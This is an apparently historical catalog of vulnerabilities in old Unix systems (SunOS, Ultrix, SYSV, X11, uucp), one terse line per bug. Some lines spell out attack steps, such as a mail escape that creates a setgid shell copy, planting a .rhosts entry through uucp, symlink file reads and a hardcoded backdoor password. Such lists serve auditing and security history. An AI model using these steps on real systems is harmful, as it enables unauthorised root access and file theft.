suid 1-- /usr/ucb/mail ~!cp /bin/sh /tmp/sh; chmod 2555 /tmp/sh ()
SunOS 3.3 1-- ftpd - userid not reset properly, "user root" ()
SunOS 3.5 1-- connect w/acct;user root;ls;put /tmp/f/ tmp/b ()
SunOS <4.0 1-- sunview - any user can read any remote file
SunOS <4.0 1-- any user can run yp server ()
SunOS 4.0 1-- chsh -- similar to chfn ()
SunOS 386i 1-- rm logintool, hack login with adb, chmod 2750 ()
SunOS 386i/4.01? 1-- login -n root requires no password ()
SunOS 386i/4.01? 1-- login -n root (no password) ()
SunOS 4.0.1 1-- chfn buffer problems ()
SunOS 4.0.1 1-- chsh buffer problems ()
SunOS 4.0.1 1-- ypbind/ypserv, SunOS 4.0.1; need 3 machines ()
SunOS 4.0.3 1-- ypbind/ypserv, SunOS 4.0.1; need 3 machines ()
SunOS 4.0.3 1-- concurrent yppasswd sessions can trash yp map ()
SunOS 4.0.3 1-- mail to any non-root owned file, try twice ()
SunOS 4.0.3 1-- rcp buffer overflow ()
SunOS 4.0.3 1-- sendmail- mail to non-root file, try twice ()
SunOS 4.0.3 1-- ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;Bw/uid;A:gets PW ()
SunOS 4.0.3 1-- uucico can show ph num, login, passwd, on remote machine ()
SunOS 4.0.3 1-- ypserv sends maps to anyone w/ domain (ypsnarf)
SunOS 4.0.? 1-- anyone can restore a file over any other file. ()
SunOS 4.0.? 1-- chfn -- allows newlines, meta chars, bufsize problem. ()
SunOS 4.0.? 1-- rcp with uid -2; only from PC/NFS. ()
SunOS 4.0.? 1-- ln -s /any/suid/file -i ; -i ()
SunOS 4.0.? 1-- selection_svc can remotely grab files. ()
SunOS 4.1 1-- rshd: spoof via nameservice, rsh target -l uid ()
SunOS 4.1 1-- shared libs accept relative paths w/ suid ()
SunOS 4.1 1-- sendmail: groups incorrectly checked, can get any group ()
SunOS 4.1 1-- comsat can overwrite any file ()
SunOS 4.1.x 1-- comsat can overwrite any file ()
SunOS 4.1.x 1-- ptrace allows to become root ()
SunOS 4.1.x 1-- openlook: telnet 2000; executive,x3, run ps int ()
SunOS <4.1.1 5-- lpr -s; 1000 calls lpr re-use fname ()
SunOS 4.1.2 5-- rdist(1) uses popen(3), IFS spoof ()
SunOS ? 1-- /usr/kvm/crash allows sh escapes group kmem ()
SunOS ? 1-- ttyA&B;A:cat<ttyB;^Z;B:exit;login;A:&;Bw/uid;A:gets PW()
SunOS ? 1-- /dev/kmem and /dev/mem should not be o+w ()
SunOS ? 1-- rshd -- spoof via nameservice, rsh target -l uid
SunOS ? 1-- ftp -n; quote user ftp; ect. Gets root privs. ()
SunOS ? 1-- symlink .plan to target file, finger user to read. ()
SunOS ? 1-- Overwrite gets buffer -- fingerd, etc. (3.5)
SunOS ? 1-- rwall bug (<= 4.01 yes). ()
SunOS ? 1-- ptrace allows to become root ()
SunOS ? 4-- icmp errors not handled correctly ()
SunOS ? 1-- adb the running kernel, shell out and get root ()
SunOS ? 1-- ftp -n; quote user ftp; ect Gets root privs ()
SunOS ? 1-- lpd can overwrite file ()
SunOS ? 1-- the window manager can be used to read any file ()
SunOS ? 1-- rexd -- any can get root access if enabled ()
SunOS ? 1-- emacsclient/server allows access to files ()
SunOS ? 1-- openlook; telnet port 2000; executive,x3, runs PS interp
SunUS ? 1-- devinfo can be used to get group kmem ()
SunOS 5.1 1-- Symlinks are broken ()
syslogd 6-- buffer overrun, allows remote access ()
syslogd 1-- syslog messages used to overwrite any file ()
system 1-- system(3) even w/ setuid(getuid()) = IFS ()
SYSV <R4 1-- write to files; race condition w/ mkdir & ln ()
SYSV <R4 1-- expreserve problem/race condition ()
SYSV R? 1-- IFS, other environment at "login:" prompt ()
tcp/ip 1-- sequence number prediction allows spoofing ()
tcp/ip 1-- source routing make host spoofing easier ()
tcp/ip 1-- rip allows one to capture traffic more easily ()
tcp/ip 4-- various icmp attacks possible ()
tftp 1-- puts/gets -- grab files, do chroot ()
traceroute 1-- allow one to easily dump packets onto net ()
ulimit 1-- passwd(1) leaves passwd locked if ulimit set ()
Ultrix 2.0? 1-- sendmail- 1.2&13.1 sm, -oQ > can r/w any ()
Ultrix 2.0? 1-- Sendmail -C file ==> displays any file. ()
Ultrix 2.2? 1-- Sendmail -C file ==> displays any file. ()
Ultrix 2.2 1-- ln passwd file to mail spool, mail to user ()
Ultrix 2.2 1-- on a non-trusted host due to bug in mountd ()
Ultrix 2.2 1-- Sendmail: -C file ==> displays any file ()
Ultrix 2.2 1-- can get root on NFS host via root via mountd ()
Ultrix 2.2 1-- get root on host running NFS from other root ()
Ultrix 3.0 1-- lock -- compiled in password "hasta la vista" ()
Ultrix 3.0 1-- login -P progname allows run programs as root ()
Ultrix 3.0 1-- login can run any program with root privs ()
Ultrix 3.0 1-- ln -s target ~/.plan; finger user to access ()
Ultrix 3.0 1-- any user can mount any filesystem ()
Ultrix 3.0 1-- X11 doesn't clear pwds in mem; /dev/mem is o+w ()
Ultrix <3.1 1-- limit file 0; passwd -->zero's out passwd file ()
Ultrix <3.1 1-- lpd can overwrite any file (back to 2.0?) ()
Ultrix 3.1? 1-- rshd: spoof via nameservice, rsh target -l uid ()
Ultrix 3.1? 1-- allows newlines, meta chars, buffsize problem ()
Ultrix <4.1 1-- overflow RISC reg buffer, get root w/ mail ()
Ultrix ? 1-- rshd -- spoof via dns, rsh target -l uid ()
Ultrix ? 1-- ypbind takes ypset from all; spoof yp DB ()
Ultrix ? 1-- yppasswd leaves yp data files world writable ()
Ultrix ? 1-- chfn -- allows newlines, meta chars, bufsize ()
Ultrix ? 1-- ftp -n; quote user ftp; ect Gets root privs ()
Ultrix ? 1-- can change host name, mount any filesystem ()
Ultrix ? 1-- uudecode alias can overwrite root/daemon files ()
Ultrix ? 4-- ICMP not handled correctly (nuke)
Ultrix ? 1-- emacsclient/server allows access to files ()
Ultrix ? 1-- lock: password "hasta la vista" backdoor ()
Ultrix ? 1-- /dev/kmem and /dev/mem should not be o+w ()
Ultrix ? 1-- can change physical ethernet address ()
UNIX 1-- / must not be go+w ()
utmp 1-- etc/utmp o+w ? ()
utmp 1-- check to see if world writeable (rwall, comsat)
utmp 1-- syslog messages can overwrite any file ()
uucp 1-- check valid UUCP akts in the /etc/ftpusers ()
uucp 1-- echo "myhost myname">x;uucp x ~uucp/.rhosts ()
uucp 1-- uucico shows ph num, login, passwd, of remote ()
uudecode 1-- if it is setuid, may create setuid files ()
uusend 1-- uusend may call "uux" while suid to root ()
uux 1-- uusend may call "uux" while suid to root ()
X11R? 1-- snoop on keyboards and bitmaps ()
X11R3 1-- can set log on and exec (fixed in "fix-6")
X11R4 1-- can set log on and exec (fixed in "fix-6")
X11R ? 1-- snoop on keyboards and bitmaps ()
X11R5 5++ xterm can create files (xterm1__)
xhost 1-- if + , anyone can connect to X server ()
ypbind 1-- accepts ypset from anyone ()
